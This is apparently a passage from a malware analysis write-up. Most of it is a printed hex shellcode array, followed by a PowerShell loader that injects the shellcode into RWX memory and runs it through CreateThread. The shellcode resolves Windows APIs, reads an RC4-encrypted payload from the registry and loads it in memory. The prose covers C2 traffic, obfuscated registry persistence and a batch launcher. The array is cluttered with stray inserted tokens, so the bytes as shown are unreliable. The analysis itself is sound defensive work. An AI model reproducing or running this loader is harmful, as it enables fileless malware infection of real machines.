x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xE5,0x01,0x00,0x00,0x8B,0x45,0xD0,<#qkq#>0x8B,0x40,0x78,0x03,0x45,0xFC,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x8B,0x40,0x18,0x85,0xC0,0x0F,<#at#>0x8C,0xCB,0x01,0x00,0x00,0x40,0x89,0x85,<#nxg#>0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,<#lcb#>0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0x4D,0xFC,0x81,0x39,0x4C,0x6F,0x61,0x64,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x4C,<#olr#>0x69,0x62,0x72,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,0x61,0x72,0x79,0x41,<#na#>0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,<#xtg#>0x8B,0x00,0x8B,0x55,0xCC,<#ige#>0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xBC,<#usr#>0x81,0x39,0x47,0x65,0x74,0x50,<#nfz#>0x75,0x56,0x8D,0x41,0x04,0x81,0x38,<#cp#>0x72,0x6F,0x63,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,<#jo#>0x64,0x64,0x72,0x65,0x75,0x40,0x8D,0x41,0x0E,0x80,0x38,0x00,<#sbs#>0x75,0x38,0x8B,<#ac#>0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,<#dd#>0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,<#vue#>0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,<#lx#>0x02,0x03,<#pha#>0xD0,0x8B,<#st#>0x02,0x03,0x45,0xFC,0x89,0x45,0xB8,<#oai#>0x81,0x39,0x56,0x69,0x72,0x74,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x75,0x61,0x6C,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,<#ums#>0x38,<#vzz#>0x6C,0x6C,0x6F,0x63,0x75,0x40,0x8D,<#uu#>0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,<#jpx#>0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,<#sxs#>0xA8,0x81,0x39,<#kdk#>0x45,0x78,0x69,0x74,0x75,0x63,0x8D,0x41,0x04,<#iwj#>0x81,<#wny#>0x38,0x50,0x72,0x6F,0x63,0x75,0x58,0x8D,<#mpl#>0x41,0x08,0x80,0x38,0x65,0x75,0x50,0x8D,0x41,0x09,0x80,0x38,0x73,0x75,0x48,0x8D,0x41,0x0A,0x80,0x38,0x73,0x75,0x40,0x83,0xC1,0x0B,<#eo#>0x80,0x39,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,<#xzx#>0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,<#bx#>0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,<#mey#>0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,<#ebh#>0x03,0xD0,<#qyl#>0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xA4,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,<#dni#>0x0F,0x85,0x3E,0xFE,0xFF,0xFF,<#qn#>0xC6,0x85,0x2F,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x30,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x31,0xFF,0xFF,0xFF,0x76,0xC6,0x85,0x32,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x33,0xFF,0xFF,0xFF,0x70,0xC6,0x85,0x34,0xFF,0xFF,0xFF,0x69,0xC6,0x85,0x35,0xFF,0xFF,0xFF,0x33,0xC6,0x85,<#mzf#>0x36,0xFF,0xFF,0xFF,0x32,<#ld#>0xC6,0x85,0x37,0xFF,0xFF,0xFF,0x2E,0xC6,0x85,0x38,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x39,0xFF,0xFF,0xFF,0x6C,0xC6,0x85,0x3A,0xFF,<#lbr#>0xFF,0xFF,0x6C,<#pu#>0xC6,0x85,0x3B,0xFF,0xFF,0xFF,0x00,0x8D,0x85,0x2F,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x75,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x89,0x5D,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0x4F,0x01,0x00,0x00,0x8B,0xC3,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0x26,0x01,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0xC3,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0x0D,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0xC3,<#th#>0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,<#ksk#>0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,0x13,0x54,0x24,<#uaz#>0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0xCB,0x81,0x39,0x52,0x65,0x67,0x4F,0x75,0x5B,0x8D,0x41,0x04,0x81,0x38,0x70,0x65,0x6E,0x4B,0x75,0x50,0x8D,0x41,0x08,0x81,0x38,0x65,0x79,0x45,0x78,0x75,0x45,0x8D,0x41,0x0C,0x80,0x38,0x41,0x75,0x3D,0x8D,0x41,0x0D,0x80,0x38,0x00,0x75,0x35,<#tx#>0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0xC3,0x89,0x45,0xB0,0x81,0x39,0x52,0x65,0x67,0x51,0x75,0x5E,0x8D,<#niu#>0x41,0x04,0x81,0x38,<#jk#>0x75,0x65,0x72,<#lq#>0x79,0x75,0x53,0x8D,0x41,0x08,0x81,0x38,0x56,0x61,0x6C,0x75,0x75,0x48,0x8D,0x41,0x0C,0x81,0x38,0x65,0x45,0x78,0x41,0x75,0x3D,0x83,0xC1,<#yqf#>0x10,0x80,0x39,0x00,0x75,<#tn#>0x35,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,<#wtn#>0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,<#vt#>0xC3,0x89,<#hne#>0x45,0xAC,0x46,<#men#>0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0xFC,<#ckz#>0xFE,0xFF,0xFF,0x8B,0x45,0x08,0x05,0x48,0x0A,0x00,0x00,0x89,0x85,0x7C,0xFF,0xFF,0xFF,<#ikq#>0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE4,0x00,0x00,<#qev#>0x00,0x89,<#xsb#>0x85,0x78,0xFF,0xFF,0xFF,0x33,0xDB,0x33,0xC0,0x89,0x85,0x64,<#ao#>0xFF,0xFF,0xFF,0x33,0xC0,0x89,0x85,0x60,0xFF,0xFF,0xFF,0x8D,0x85,0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x02,0x00,0x00,0x80,0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,0x8D,0x85,0x60,0xFF,<#oz#>0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,<#xde#>0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,<#chq#>0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,<#bu#>0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,<#kf#>0xFF,<#yac#>0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,<#yl#>0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,<#mx#>0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x33,0xC0,0x89,0x85,<#hn#>0x70,0xFF,0xFF,0xFF,0x84,0xDB,0x0F,<#ds#>0x85,0xB8,0x00,0x00,0x00,0x33,0xC0,0x89,0x85,<#uu#>0x64,0xFF,0xFF,0xFF,<#xo#>0x33,0xC0,0x89,0x85,<#mnf#>0x60,0xFF,0xFF,0xFF,0x8D,0x85,0x70,0xFF,0xFF,0xFF,<#gdg#>0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x01,0x00,0x00,0x80,0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,<#gwq#>0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,<#nrl#>0x55,0xAC,0x85,<#as#>0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,<#qr#>0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,<#fzq#>0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,<#npu#>0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,<#epp#>0x85,<#rc#>0x70,0xFF,0xFF,0xFF,<#poi#>0x50,<#tg#>0xFF,0x55,0xAC,<#stt#>0x85,0xC0,<#kw#>0x75,0x02,0xB3,0x01,0x84,0xDB,<#sax#>0x75,0x05,<#omp#>0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,<#txd#>0xDC,0x00,0x00,0x00,0x50,0x8B,0x85,<#arg#>0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x52,0x50,0x8D,0x85,0x00,0xFA,0xFF,0xFF,0x50,<#cpp#>0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,0x89,0x31,0x46,0x83,0xC1,0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xF2,0x33,0xDB,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,<#axj#>0x03,0x19,<#vqm#>0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0xFF,0xB0,0xDC,0x00,0x00,0x00,0x8B,0xC6,<#wrv#>0x5A,0x8B,0xFA,0x33,0xD2,0xF7,0xF7,0x33,0xC0,0x8A,0x84,0x15,0x00,0xFA,0xFF,0xFF,0x03,0xD8,0x81,0xE3,0xFF,0x00,0x00,0x00,0x8A,0x01,<#onn#>0x8B,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x89,0x11,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0x9D,0x00,0xFB,0xFF,0xFF,0x46,0x83,0xC1,<#zq#>0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xB5,<#zjb#>0x33,0xDB,0x33,0xFF,<#xgp#>0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,<#dn#>0x85,<#oo#>0x60,0xFF,0xFF,0xFF,0x50,0x6A,<#bzq#>0x00,0xFF,<#ato#>0x55,<#tu#>0xA8,0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x83,0xBD,0x5C,0xFF,<#kk#>0xFF,0xFF,0x00,0x74,0x29,0x8B,0x85,<#ynp#>0x5C,0xFF,0xFF,0xFF,0x89,0x85,<#ttp#>0x4C,0xFF,0xFF,0xFF,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8B,0x85,<#bbk#>0x4C,0xFF,0xFF,0xFF,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0xEB,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x60,0xFF,<#ddv#>0xFF,0xFF,0x48,0x85,0xC0,0x72,0x74,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x43,0x81,0xE3,0xFF,0x00,0x00,0x00,0x03,0xBC,0x9D,0x00,0xFB,0xFF,0xFF,0x81,0xE7,0xFF,0x00,0x00,0x00,0x8A,0x84,0x9D,0x00,0xFB,0xFF,0xFF,0x8B,0x94,0xBD,0x00,0xFB,0xFF,<#upn#>0xFF,0x89,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x25,<#xrf#>0xFF,0x00,0x00,0x00,0x89,0x84,0xBD,0x00,0xFB,0xFF,0xFF,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x8A,0x04,0x30,0x8B,0x94,0x9D,0x00,<#crf#>0xFB,0xFF,0xFF,0x03,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x81,0xE2,0xFF,0x00,0x00,0x00,<#oa#>0x32,0x84,0x95,0x00,0xFB,0xFF,0xFF,0x8B,0x95,0x4C,0xFF,0xFF,0xFF,0x88,0x04,0x32,0x46,<#suu#>0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0x95,0x8B,0x85,<#tx#>0x4C,0xFF,0xFF,0xFF,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0xDA,0x02,0x00,0x00,0x8B,0x45,<#yn#>0xD4,0x8B,0x40,0x3C,0x03,0x85,0x4C,0xFF,0xFF,0xFF,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xBC,<#vy#>0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x58,0x50,0x03,0xDB,0x6A,0x40,<#lv#>0x68,0x00,0x30,0x00,0x00,<#dlf#>0x53,<#fru#>0x6A,<#ar#>0x00,0xFF,0x55,0xA8,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x0F,0x84,0x9A,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x54,0x50,0x8B,<#sp#>0x85,<#ltb#>0x4C,0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xF8,<#lfl#>0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,0x04,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE0,0x00,0x00,0x00,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xE0,0x00,0x00,0x00,0x50,0x8B,0x85,0x4C,0xFF,0xFF,<#rpo#>0xFF,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,0x60,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x7A,0x50,0x8B,0x45,0xD0,0x8B,<#imm#>0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x8B,<#wfm#>0x95,0x7C,0xFF,0xFF,0xFF,0x03,0x82,0xE0,0x00,0x00,0x00,0x50,<#pj#>0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x0F,0xB7,0x40,0x06,0x48,0x85,0xC0,0x7C,0x5F,0x40,0x89,<#not#>0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,<#qv#>0x8B,0x55,0xD4,0x8B,0x52,0x3C,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x03,0xD0,0x81,0xC2,0xF8,<#yxg#>0x00,0x00,0x00,0x8B,0xCE,0xC1,0xE1,0x03,0x8D,<#xe#>0x0C,0x89,0x03,<#vzm#>0xD1,0x89,0x95,0x50,0xFF,0xFF,<#hki#>0xFF,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,0x10,0x52,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,0x14,0x03,0xD0,0x52,0x8B,0x85,0x50,0xFF,0xFF,0xFF,0x8B,<#gk#>0x40,0x0C,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,<#zci#>0xFF,0xFF,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0xAA,0x8B,0x45,0xD0,0x8B,0x40,<#ri#>0x34,<#ssf#>0x3B,0x45,0xF8,0x0F,0x84,<#vm#>0xCB,0x00,<#ns#>0x00,0x00,0x8B,<#qvm#>0x45,0xD0,0x8B,0x55,0xF8,0x2B,0x50,0x34,0x89,0x55,0xD8,0x8B,0x45,0xF8,0x89,0x45,0xF0,0x8B,0x45,0xD0,0x83,0xB8,0xA4,<#of#>0x00,0x00,<#yk#>0x00,0x00,0x0F,0x86,0x87,0x00,0x00,<#va#>0x00,0x8B,0x45,0xD0,0x8B,0x80,0xA0,<#mx#>0x00,0x00,0x00,0x03,0x45,0xF0,0x89,<#lku#>0x45,0xEC,0xEB,0x6E,0x8B,0x45,0xEC,0x8B,0x00,0x03,0x45,0xF0,0x89,0x45,0xE8,0x8B,0x45,0xEC,0x83,0xC0,0x08,0x89,0x45,<#itp#>0xE4,<#vf#>0x8B,0x45,0xEC,0x8B,0x40,0x04,0x83,0xE8,0x08,0xD1,0xE8,0x48,0x85,0xC0,0x72,0x3E,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x8B,0x45,0xE4,0x66,0x8B,0x10,0x0F,0xB7,0xC2,0xC1,0xE8,0x0C,0x8B,0xCA,0x66,<#qv#>0x81,0xE1,0xFF,0x0F,0x0F,0xB7,0xC9,0x83,0xF8,0x03,0x75,0x10,0x8B,0x45,0xE8,0x03,0xC1,0x89,0x45,0xE0,0x8B,0x45,0xE0,0x8B,0x55,0xD8,0x01,0x10,0x83,0x45,0xE4,0x02,0xFF,0x8D,0x3C,0xFF,0xFF,<#sw#>0xFF,<#vj#>0x75,0xC9,0x8B,0x45,0xEC,0x8B,0x40,0x04,0x03,0x45,<#it#>0xEC,0x89,<#ikx#>0x45,<#irx#>0xEC,0x8B,0x45,0xEC,0x83,0x38,0x00,0x77,0x8A,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x89,0x50,0x34,0x68,0xF8,0x00,0x00,0x00,0x8B,<#yia#>0x45,<#ngg#>0xD0,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x03,0x45,0xF8,0x50,0xFF,<#lw#>0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x05,0x80,0x00,0x00,0x00,0x89,0x45,<#eeu#>0x90,0x8B,0x45,0x90,0x83,0x78,0x04,0x00,0x0F,<#ebt#>0x86,0x9E,0x00,<#cf#>0x00,<#iuu#>0x00,0x8B,0x45,<#iu#>0xD0,0x8B,0x80,0x80,<#sg#>0x00,0x00,<#tav#>0x00,0x03,0x45,0xF8,0x89,0x45,0x8C,0xEB,0x7F,0x03,<#kae#>0x7D,0xF8,0x57,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x74,0x72,0x8B,0x45,0x8C,0x83,0x38,0x00,0x74,0x0D,0x8B,0x45,0x8C,0x8B,0x00,<#da#>0x03,0x45,0xF8,0x89,0x45,0x88,0xEB,0x0C,0x8B,0x45,0x8C,0x8B,0x40,0x10,0x03,0x45,0xF8,0x89,0x45,0x88,0x8B,0x45,0x8C,0x8B,<#lo#>0x40,0x10,0x03,0x45,0xF8,0x89,0x45,0x84,0xEB,0x37,0x8B,0x45,0x88,<#ut#>0x8B,0x30,<#eyt#>0xF7,0xC6,0x00,0x00,0x00,0x80,0x74,0x12,0x81,0xE6,<#ruo#>0xFF,0xFF,0x00,0x00,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,<#sg#>0xEB,0x10,0x03,0x75,0xF8,0x83,0xC6,0x02,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,<#ni#>0x83,0x45,0x88,<#eb#>0x04,0x83,<#fpa#>0x45,<#za#>0x84,0x04,0x8B,0x45,0x88,0x83,<#ezq#>0x38,0x00,0x75,0xC1,0x83,0x45,0x8C,0x14,0x8B,0x45,0x8C,0x8B,0x78,0x0C,0x85,0xFF,0x0F,0x85,0x73,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,<#fyw#>0x8B,0x40,0x28,0x03,0x45,0xF8,0x89,0x45,0xF4,0x31,0xC0,0x50,0x6A,0x01,0xFF,0x75,0xF8,0xFF,0x55,0xF4,<#vag#>0x6A,0x00,<#hoz#>0xFF,0x55,0xA4,<#mri#>0x5F,0x5E,<#qb#>0x5B,0x8B,0xE5,0x5D,0xC2,0x04,<#sh#>0x00,0x8D,0x40,<#mpx#>0x00,0x73,0x6F,0x66,0x74,0x77,0x61,0x72,0x65,0x5C,<#ytl#>0x37,<#zkf#>0x47,0x57,0x73,0x61,0x41,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#gca#>0x00,0x00,0x00,<#rz#>0x00,0x00,0x00,<#no#>0x00,0x00,0x00,<#dfd#>0x00,0x00,0x00,0x00,0x47,0x73,0x44,0x79,0x71,0x74,0x55,0x36,0x71,0x6E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x72,<#qfr#>0x82,0x97,0x46,0xE4,0x1B,0xF2,0xAB,0xD9,0x00,0x0A,0x97,0x82,0x25,0x5F,0xE4,0x99,0x5D,0xB6,0x8E,0x73,0x23,0x46,0x7A,0x92,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x73,0x00,0x68,0x00,0x65,<#ju#>0x00,0x6C,0x00,0x6C,0x00,0x3C,0x00,0x3C,<#aws#>0x00,0x3A,0x00,0x3A,0x00,<#bfw#>0x3E,0x00,0x3E,0x00,<#jp#>0x73,0x00,0x68,0x00,0x65,0x00,0x6C,0x00,0x6C,0x00,0x62,0x00,<#ad#>0x70,0x00,0x73,0x00,0x3A,0x00,0x3A,0x00,0x62,0x00,0x70,0x00,0x73,0x00,0x6E,0x00,0x75,0x00,0x6D,0x00,0x3A,0x00,0x38,0x00,0x36,0x00,0x34,0x00,<#vy#>0x3A,0x00,0x6E,0x00,0x75,<#zkg#>0x00,0x6D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#wcm#>0x00,0x00,<#kx#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x19,0x00,0x00,0x00,0x00,0xAA,0x06,0x00,<#ae#>0x55,0x8B,0xEC,0x60,0x8B,0x7D,0x08,0x8B,0x75,0x0C,0x8B,0x4D,0x10,0xF3,0xA4,0x61,0x5D,0xC2,0x0C,0x00,<#bh#>0xD6,0x27,0xD1,0x58,0x00,0xA0,0x66,0x37,0x13,0x99,0x44,0x82,0x36,0x02,0xCF,0x82,0x58,0xCA,0x0B,0x78,0x64,0xB2,0xF7,0x99,0x2D,0x64,0xA7,<#nfv#>0xAB,0x5F,0x0D,0x9B,0xFB,0x45,0xC2,0x2B,0xAC,0x33,<#dxg#>0x55,0x13,0x8E,0xCC,0x66,0x63,0x12,0x97,0xED,0x6A,0xFE,0x7E,0x71,<#ay#>0x5B,0xED,<#fv#>0x2F,0xA4,0xC5,<#ong#>0xC7,0x8E,0x38,0x25,0xC9,0x97,0x04,<#ty#>0x16,0xB4,0x67,0xDD,0xFA,0x42,0x4F,0xBE,<#wp#>0x20,0x01,0x2D;
#ebfvxkffvl
$pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);
#zfgd
if($pr -ne 0){$memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));
#phjynzzoqx
for ($i=0;$i -le ($sc32.Length-1);$i++) {$memset.Invoke(($pr+$i), $sc32[$i], 1)};
#lvytjj
([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);
#pjqtttzp
}sleep(1200);}catch{}exit;
#usrucw
#otlbloab
Like the two files that are dropped above, I am not sure what the difference is between the two regsvr32.exe processes. The parent process (PID 1740) is the process that keeps reaching out the C2s as seen in the image labeled “C2s.” This parent process is also responsible for creating and setting other registry keys/values which looks to be somewhat related to what the “a2.exe” process was doing too (for persistence).
Path: HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\tscz Type: REG_SZ Length: 34 Data: c2lCgcJpAleIXg== ----- Path: HKCU\Software\lqoiarkklq\tscz Type: REG_SZ Length: 34 Data: dD9Hi8VsVasp+w== ----- Path: HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\rhllonear Type: REG_SZ Length: 66 Data: dW0V3ZU4UEEp/bQvhCo/2F9ajF1fefY=
Persistence is maintained via an entry in the “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” registry key which comes up with an error when you try to view it as seen in the image below.
Using “Autoruns” I am able to see that there is a pointer there in the registry and that it is pointing to the path of “C:\Users\Administrator\AppData\Local\1354e279\e7da1628.bat.” That file contains the following code:
start "yYPkyKv4BygZ9zHX9iqui6" "%LOCALAPPDATA%\1354e279\c3046d01.e5782001b"
The file that is being called in the batch file looks to be an encrypted file of sorts.
